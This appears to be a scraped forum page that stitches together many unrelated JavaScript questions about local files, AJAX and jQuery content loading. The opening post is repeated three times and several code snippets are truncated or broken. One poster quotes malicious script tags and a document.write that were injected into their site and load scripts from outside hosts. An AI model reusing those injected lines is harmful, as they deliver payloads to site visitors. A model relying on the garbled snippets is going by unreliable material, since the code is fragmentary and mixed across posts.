Not Displaying In Local Files - When Load The Page - Keeps Popping Up Do U Want To Allow This Content
Jul 11, 2011
I have Win 7, IE9. I have a HTML file on my hard drive, with Javascript within. When I load the page, it keeps popping up Do u want to allow this content, I have to click to allow. I want to stop this, and after doing some searching I found the setting in Internet Options, Advanced - "Allow active content to run in files on my computer".
Perfect.
Doesnt work. When i check this box, the page loads without the warning, but then the Javascript just doesnt work.
Getting quite annoying, because this file is my home page.
I have Win 7, IE9. I have a HTML file on my hard drive, with Javascript within. When I load the page, it keeps popping up Do u want to allow this content, I have to click to allow. I want to stop this, and after doing some searching I found the setting in Internet Options, Advanced - "Allow active content to run in files on my computer".
Perfect.
Doesnt work. When i check this box, the page loads without the warning, but then the Javascript just doesnt work. Getting quite annoying, because this file is my home page.
I have Win 7, IE9. I have a HTML file on my hard drive, with Javascript within. When I load the page, it keeps popping up Do u want to allow this content, I have to click to allow. I want to stop this, and after doing some searching I found the setting in Internet Options, Advanced - "Allow active content to run in files on my computer".
Perfect.
Doesnt work. When i check this box, the page loads without the warning, but then the Javascript just doesnt work. Getting quite annoying, because this file is my home page.
I have the following JavaScript (see below). The script requests an XML file from the server and displays it on the page.The script works fine when the requested XML file is stored on the same server as the script.The problem is when I try requesting an XML file from an external server such as the National Weather Service. I get an error. If I take the XML file from the National Weather Service and save it to my server it works. Why can't I use my script to request XML files stored on external servers?
Javascript Code
Code:
window.onload = initAll; var xhr = false; function initAll() { document.getElementById("makeTextRequest").onclick = getNewFile;
I have successfully loaded an element of content from another section of our website on a page, but for some reason it is firing .load() twice and displaying the section of content twice, stacked on top of each other.
I'm making a quick and dirty Google Calendar displayer with help from Full Calendar and am struggling to display the details of each Google event correctly. As you may know, if you're not logged into Google Calendar, if you're given an event link or invitation you will be taken to a dynamically generated page displaying the basic details of that event. It includes a <link> ed stylesheet and inline style="..." for each element. I have attached a screenshot of a typical event page.
I'm trying to strip out all the style and just display the content:
eventClick: function(event) { if (event.url) { $("#details").hide().load(event.url); $("#details *").each(function(){
I'm using the localscroll jquery plugin to scroll through content in a div by using an unorder list navigation. I have the containing div (#page) set at a certain height and the overflow set to hidden.. the problem I'm having is I want the #page div to be elastic so that it grows and shrinks to fit the child div it scrolls to..you can view the scroll plugin in use here:
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its activated using the product list nav toward the bottom of the page on the left.How would I set it up so that the #page div shrinks or grows to contain the full visable size of the child div (.scroll1, .scroll2, .scroll3, scroll4 etc)
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function init(){ if(document.getElementById && document.createTextNode){ var mn=document.getElementById('nav'); var as=mn.getElementsByTagName('a'); for (var i=0;i<as.length;i++){ as[i]. false} as[i]. false} } hidem(); }}
function show(l){ hidem(); var id=l.href.match(/#(w.+)/)[1]; document.getElementById(id).style.display='block' }
function hidem(){ for (var i=0;i<document.getElementsByTagName('div').length;i++){ document.getElementsByTagName('div')[i].style.display='none' }}
We use a variety of plugins on a wordpress site we're developping. But two of them seem to be conflicting, causing one not to load/work properly. One uses jQuery and the other one uses scriptaculous/prototype. It seems those two have some issues running together.
As jQuery is the default library loaded, is there a way (without modifying the $-function) to exclude jQuery from loading from this one page where Scriptaculous is needed?
I need to make a page that will make a list of all the files in its folder and display the names of the files on the page. It needs to be able to work offline.
I know how to do this with php server side code, but this needs to be able to run on a memory stick. Is Javascript the best way to do this?
My files are not hosted on a server using http. They come with many sound files to practice vocabulary. The problem is that IE8 does not give me the opportunity to load xml course info, I suspect it is because Microsoft might think IE is for network use only (funny they don't think that when MS Word is concerned). Everything works fine in opera and firefox but IE does not give me a documentElemet after loading the xml. Here is some code to reproduce:
I've been working in VBA for quite some time, and would like to make some of my scripts available through a browser. One script will open a text file, parse it, and then commit the parsed results into an object. I can't for the life of me figure out how to do this task in js...
A script to read the current roots directory or filenames-list into a Javascript array?
Some say it is only possible by calling a JAVA applet method and returning the array as a public variable for Javascript to use...if so, has anyone done it and can provide a sample?
I am only trying to read directories & image files offline, on the current root level or perhaps up a folder, so I hope there are no security access issues to deal with.
Is there a way to scan files on a local hard drive using Javascript? I'm trying to create a GUI for a program using html and js. As such the html files will only be accessed from the local machine using Firefox. I would like to avoid using server-side scripts, as I want to use this on a computer without server software installed. My overall objective is I want the javascript to scan all files (data plots I've made) in a directory on the local machine. The JS would create a list of possible dates based on which files were found, the user would then select the date which would then display the corresponding plot.
We have a directory of files on our ftp server. Is there a javacript to make a connection to the ftp server and compare files on a local drive and on the server? Files that have been changed or added need to be copied across from the ftp server to the local drive.
On uploading files (PHP and javascript) to the server from local machine via dreamweaver, Google Chrome reported the presence of malicious codes (like loto-49) inside the server page. Later when I checked, I found that a HTML Code:document.write('....loto-49.com....'); was automatically added at the end of each javascript *.js files. On their removal, the warnings were gone.Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:
HTML Code: <script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
Here is what I'm trying to do but the problem is "source.html" is not on a server somewhere. I am running everything locally. $('#container').load(source.html #sourceContent) Is there a way to do this exact thing but with a local file?
I tried to add links to open local xml files in browser in a dynamic table cells. I need help. I tried all ways but I think I miss something.I can open them without table just by document.write(xmlfile location).
function showResultsTable(searched, srchedname) { // get the reference for the body var mybody = document.getElementsByTagName("body")[0];
I'm looking for the way to resize an element when the page loading. I'm doing some test and I've try :
function placeHeader () { var x; document.getElementById('header').style.display = 'visible' for (x = 0; x < 150;x++) { document.getElementById('header').style.width = x + "px"; }}
I have been searching online for hours, but it is possible I'm just not thinking of the correct keywords. I have included a basic illustration of the current setup (which does not work). The issue lies with the page that is the desired output. I have a far deeper issue which I have narrowed down to javascript on the final .asp page not loading at all.
On default.asp, I am calling a function contained in 'ajax_call-contentselection.js'
Honestly, I don't believe the following piece of code (ajax_call-contentselection.js) is relevant, as it is standard ajax code, but just in case:
Code:
function func_displaycontents(var_type){ var xmlHttp = GetXmlHttpObject(); var url = "../_include/ajax_display-contentselection.asp";
[code]...
The other contents of "ajax_display-contentselection.asp" are displayed properly in "div_ajaxfillattractions" of "default.asp", but no javascript code on that page loads. If I use "ajax_display-contentselection.asp" as an include file on "default.asp", I get the javascript alert of 'Success', but when I initiate the AJAX it does not work, so I know there isn't a problem with the javascript.
I want to know how i can make a page that opens and loads content in a div tag when i click a certain link on my home page. i have a javscript code to load content into a div tag when the link is on the same page as the div tag, but i want to get a script where it will open a new page and load content into a div tag on that page.
like the link must be something like main.html?div=content.html i know how to do this with iframes, but i want to work with div tags :)
Guys sorry I am to 100% new to this and this code landed in my lap today. The problem is the content switches fine after the user clicks on each menu item, but the content window is empty when the page first loads. I would like to set page1 content to be visible when the page first loads.